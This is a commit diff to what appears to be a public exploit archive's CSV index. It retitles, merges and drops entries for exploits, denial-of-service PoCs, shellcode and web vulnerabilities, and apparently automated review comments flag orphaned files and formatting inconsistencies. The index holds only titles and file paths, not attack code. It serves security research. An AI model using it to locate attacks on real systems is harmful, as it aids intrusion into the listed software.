DB: 2016-05-14

3 new exploits

Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit
Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit

Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit
Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit

Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability

Absolute Form Processor XE-V 1.5 - (auth Bypass) SQL Injection Vulnerability

ipsec-tools racoon frag-isakmp Denial of Service PoC
IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC
PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability
PaoBacheca Guestbook 2.1 - (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 - (login_ok) Authentication Bypass Vulnerability
IPsec-Tools < 0.7.2 - Multiple Remote Denial of Service Vulnerabilities
ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability

I-net Multi User Email Script SQLi Vulnerability

linux/x86 - break chroot execve /bin/sh 80 bytes
linux/x86 - break chroot execve /bin/sh (80 bytes)

Sysax Multi Server 5.64 - Create Folder Buffer Overflow

TikiWiki Project 1.8 tiki-read_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter XSS

TikiWiki Project 1.8 tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_trackers.php sort_mode Parameter SQL Injection
UBBCentral UBB.threads 6.2.3/6.5 login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 online.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS

CityPost PHP Image Editor M1 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M2 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M3 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M4 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting Vulnerability
osCommerce 2.2 admin/countries.php page Parameter XSS
osCommerce 2.2 admin/currencies.php page Parameter XSS
osCommerce 2.2 - admin/countries.php page Parameter XSS
osCommerce 2.2 - admin/currencies.php page Parameter XSS
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (2)

Joomla Gallery WD - SQL Injection Vulnerability

Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption Vulnerabilities
NRSS Reader 0.3.9 - Local Stack-Based Overflow
runAV mod_security - Arbitrary Command Execution
Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read
Offensive Security 2016-05-14 05:03:47 +00:00
parent 3ef2faa870
commit 5e229672a0
16 changed files with 210 additions and 721 deletions


@ -775,7 +775,7 @@ id,file,description,date,author,platform,type,port
953,platforms/windows/remote/953.c,"Yager <= 5.24 - Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089
954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0
955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21
956,platforms/multiple/dos/956.c,"Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0
956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0
957,platforms/linux/dos/957.c,"Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0
958,platforms/linux/dos/958.c,"Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0
959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 (isis_print) Infinite Loop DoS Exploit",2005-04-26,vade79,linux,dos,0
@ -802,7 +802,7 @@ id,file,description,date,author,platform,type,port
982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,N/A,php,webapps,0
983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0
984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0
986,platforms/windows/remote/986.html,"Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)",2005-05-07,Silentium,windows,remote,0
988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0
989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0
@ -6846,7 +6846,6 @@ id,file,description,date,author,platform,type,port
7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0
7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0
7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,R3d-D3V!L,php,webapps,0
7300,platforms/php/webapps/7300.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability",2008-11-30,R3d-D3V!L,php,webapps,0
7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0
7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Remote blind SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0
7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 (qtv.mdb) Database Disclosure Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0
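Review bot: entry 7300 (Active Price Comparison 4, R3d-D3V!L, 2008-11-30) is dropped from the index in this hunk, but nothing visible on this page deletes platforms/php/webapps/7300.txt and no duplicate entry replaces it, so the file is left orphaned unless it is removed elsewhere in the same commit. Either delete the file here or record the reason for dropping the entry in the commit message, which currently lists the title with no explanation.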
@ -8036,7 +8035,6 @@ id,file,description,date,author,platform,type,port
8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0
8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0
8528,platforms/asp/webapps/8528.txt,"Absolute Form Processor XE-V 1.5 - (auth Bypass) SQL Injection Vulnerability",2009-04-24,"ThE g0bL!N",asp,webapps,0
8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling Vulnerability",2009-04-24,ZoRLu,asp,webapps,0
8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Pasword Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0
8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - (.ASX) Local Heap Overflow PoC",2009-04-24,Cyber-Zone,windows,dos,0
@ -8175,7 +8173,7 @@ id,file,description,date,author,platform,type,port
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0
8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 - (.hfz) Directory Traversal Vulnerability",2009-05-13,Nine:Situations:Group,windows,local,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
@ -8767,8 +8765,8 @@ id,file,description,date,author,platform,type,port
9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary Shell Upload Vulnerability",2009-07-28,Mr.tro0oqy,php,webapps,0
9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local BoF Exploit (SEH)",2009-07-28,Koshi,windows,local,0
9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Auth Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9295,platforms/windows/dos/9295.txt,"Firebird SQL op_connect_request main listener shutdown Vulnerability",2009-07-28,"Core Security",windows,dos,0
9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0
9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion Vulnerability",2009-07-28,NoGe,php,webapps,0
@ -9387,8 +9385,6 @@ id,file,description,date,author,platform,type,port
10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0
10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 - 4.2-beta1 - Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0
10014,platforms/multiple/dos/10014.txt,"IPsec-Tools < 0.7.2 - Multiple Remote Denial of Service Vulnerabilities",2009-11-09,mu-b,multiple,dos,0
10015,platforms/multiple/remote/10015.txt,"ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability",2009-11-10,"Jon Oberheide",multiple,remote,67
10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0
10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0
10018,platforms/linux/local/10018.sh,"Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0
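Review bot: two entries are removed in this hunk with only one visible justification. 10014 (IPsec-Tools < 0.7.2, mu-b) duplicates 8669, which the hunk at -8175 retitles to the same product and version range, so dropping it is fine; 10015 (ISC DHCP 'dhclient' 'script_write_params()' stack buffer overflow, Jon Oberheide, port 67) has no counterpart anywhere in the diff. Keep 10015 unless a duplicate exists, or state the reason for its removal in the commit message, which currently only lists the title.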
@ -10839,7 +10835,6 @@ id,file,description,date,author,platform,type,port
11847,platforms/windows/webapps/11847.txt,"Joomla Component com_gds SQL Injection Vulnerability",2010-03-23,"DevilZ TM",windows,webapps,0
11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Include Vulnerability",2010-03-23,mat,php,webapps,0
11850,platforms/php/webapps/11850.txt,"Zephyrus CMS (index.php) SQL Injection Vulnerability",2010-03-23,Phenom,php,webapps,0
14129,platforms/linux/webapps/14129.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-30,Sid3^effects,linux,webapps,0
11851,platforms/php/webapps/11851.txt,"Joomla Component Property Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0
11852,platforms/php/webapps/11852.txt,"Xataface Admin Auth Bypass Vulnerability",2010-03-23,Xinapse,php,webapps,0
11853,platforms/php/webapps/11853.txt,"Joomla Component SMEStorage Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0
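Review bot: 14129 (I-net Multi User Email Script SQLi, Sid3^effects) was filed out of sequence between 11850 and 11851, dated 2010-06-30 among 2010-03-23 entries, and carried platform linux for what the advisory describes as a CGI/Perl web application. Removing it clears the misplacement; if the advisory is to be retained it should be re-added in ID order with platform cgi, the way 954 (E-Cart, index.cgi) is indexed in the first hunk.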
@ -11934,7 +11929,7 @@ id,file,description,date,author,platform,type,port
13451,platforms/lin_x86/shellcode/13451.c,"linux/x86 add user 104 bytes",2004-09-12,"Matt Conover",lin_x86,shellcode,0
13452,platforms/lin_x86/shellcode/13452.c,"linux/x86 - break chroot 34 bytes",2004-09-12,dev0id,lin_x86,shellcode,0
13453,platforms/lin_x86/shellcode/13453.c,"linux/x86 - break chroot 46 bytes",2004-09-12,dev0id,lin_x86,shellcode,0
13454,platforms/lin_x86/shellcode/13454.c,"linux/x86 - break chroot execve /bin/sh 80 bytes",2004-09-12,preedator,lin_x86,shellcode,0
13454,platforms/lin_x86/shellcode/13454.c,"linux/x86 - break chroot execve /bin/sh (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0
13455,platforms/lin_x86/shellcode/13455.c,"linux/x86 execve /bin/sh encrypted 58 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13456,platforms/lin_x86/shellcode/13456.c,"linux/x86 execve /bin/sh xor encrypted 55 bytes",2004-09-12,N/A,lin_x86,shellcode,0
13457,platforms/lin_x86/shellcode/13457.c,"linux/x86 execve /bin/sh tolower() evasion 41 bytes",2004-09-12,N/A,lin_x86,shellcode,0
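Review bot: the retitle of 13454 puts the size in parentheses, "(80 bytes)", while every neighbouring shellcode entry in this hunk (13451 "104 bytes", 13452 "34 bytes", 13453 "46 bytes", 13455 "58 bytes", 13456 "55 bytes", 13457 "41 bytes") keeps the bare form, so the change makes the block less consistent rather than more. Either apply the same format to the siblings in this commit or leave 13454 alone.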
@ -18024,7 +18019,7 @@ id,file,description,date,author,platform,type,port
20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0
20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0
20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0
20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0
20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,"Matt Andreko",windows,remote,0
20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0
20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0
20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0
@ -21160,10 +21155,10 @@ id,file,description,date,author,platform,type,port
23952,platforms/php/webapps/23952.txt,"TikiWiki Project 1.8 categorize.php Direct Request Path Disclosure",2004-04-12,JeiAr,php,webapps,0
23953,platforms/php/webapps/23953.txt,"TikiWiki Project 1.8 messu-mailbox.php Multiple Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23954,platforms/php/webapps/23954.txt,"TikiWiki Project 1.8 messu-read.php Multiple Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 tiki-read_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 tiki-browse_categories.php parentId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 tiki-index.php comments_threshold Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 tiki-print_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 tiki-list_file_gallery.php galleryId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 tiki-upload_file.php galleryId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 tiki-view_faq.php faqId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
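Review bot: only 23955 and 23958 gain the " - " separator in this hunk, while 23956, 23957, 23959, 23960 and 23961 (same product, same author JeiAr, same date) keep the old form. If the separator is the target style, normalize the whole TikiWiki 1.8 block in one pass instead of two entries at a time.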
@ -21179,8 +21174,8 @@ id,file,description,date,author,platform,type,port
23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23974,platforms/php/webapps/23974.txt,"TikiWiki Project 1.8 tiki-file_galleries.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 - tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 - tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Parameter Cross-Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
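Review bot: 23975 and 23976 get the " - " separator here but 23973, 23974, 23977 and 23978 do not, leaving the sort_mode SQL injection block half converted (23972 already had it). Also, 33401 (Million Pixel Script 3) sits between 23978 and the next block, out of ID order; it is untouched by this hunk but worth moving while this region is being edited.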
@ -21986,8 +21981,8 @@ id,file,description,date,author,platform,type,port
24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0
24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.threads 6.2.3/6.5 showflat.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.threads 6.2.3/6.5 calendar.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 login.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 online.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 KDE KFMCLIENT Remote Command Execution Vulnerability",2004-12-13,"Giovanni Delvecchio",linux,dos,0
24829,platforms/php/webapps/24829.txt,"PhpGedView 2.5/2.6 Login.PHP URL Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0
24830,platforms/php/webapps/24830.txt,"PhpGedView 2.5/2.6 Login.PHP Username Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0
@ -22603,11 +22598,7 @@ id,file,description,date,author,platform,type,port
25456,platforms/asp/webapps/25456.txt,"OneWorldStore DisplayResults.ASP Cross-Site Scripting Vulnerability",2005-04-19,Lostmon,asp,webapps,0
25457,platforms/php/webapps/25457.c,"UBBCentral 6.0 UBB.threads Printthread.PHP SQL Injection Vulnerability",2005-03-11,HLL,php,webapps,0
25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 Message.PHP Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25460,platforms/php/webapps/25460.txt,"CityPost PHP Image Editor M2 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25461,platforms/php/webapps/25461.txt,"CityPost PHP Image Editor M3 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25462,platforms/php/webapps/25462.txt,"CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25463,platforms/php/webapps/25463.txt,"CityPost PHP Image Editor M4 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload Simple-upload-53.PHP Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script Denial of Service Vulnerability",2005-04-20,anonymous,linux,dos,0
25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/Login.ASP SQL Injection Vulnerability",2005-04-20,c0d3r,asp,webapps,0
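Review bot: collapsing 25459 through 25463 into a single 25459 entry retires four IDs (25460, 25461, 25462, 25463) from the index, yet the diff does not show the corresponding files being deleted or their content merged into the 25459 advisory; after this hunk the combined title "M1/M2/M3/Imgsrc/M4" is the only record that the other four parameters were ever reported. Confirm that the merged file covers all five parameters, or delete the orphaned files in the same commit.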
@ -25794,8 +25785,8 @@ id,file,description,date,author,platform,type,port
28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 Calendar.ASP Cross-Site Scripting Vulnerability",2006-10-27,MizoZ,asp,webapps,0
28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 admin/banner_manager.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 admin/banner_statistics.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 admin/countries.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 admin/currencies.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - admin/countries.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - admin/currencies.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 admin/languages.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 admin/manufacturers.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 admin/products_expected.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
@ -25923,8 +25914,8 @@ id,file,description,date,author,platform,type,port
28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
28875,platforms/php/webapps/28875.txt,"Freenews 1.1 Aff_News.PHP Remote File Include Vulnerability",2006-10-30,MoHaNdKo,php,webapps,0
28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1)",2006-10-30,"Michal Bucko",windows,remote,0
28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2)",2006-10-30,"Michal Bucko",windows,remote,0
28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (1)",2006-10-30,"Michal Bucko",windows,remote,0
28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (2)",2006-10-30,"Michal Bucko",windows,remote,0
28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 login.php username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0
28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service Vulnerability",2006-10-30,"Wojciech H",windows,dos,0
@ -32986,7 +32977,6 @@ id,file,description,date,author,platform,type,port
36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0
36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
36564,platforms/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
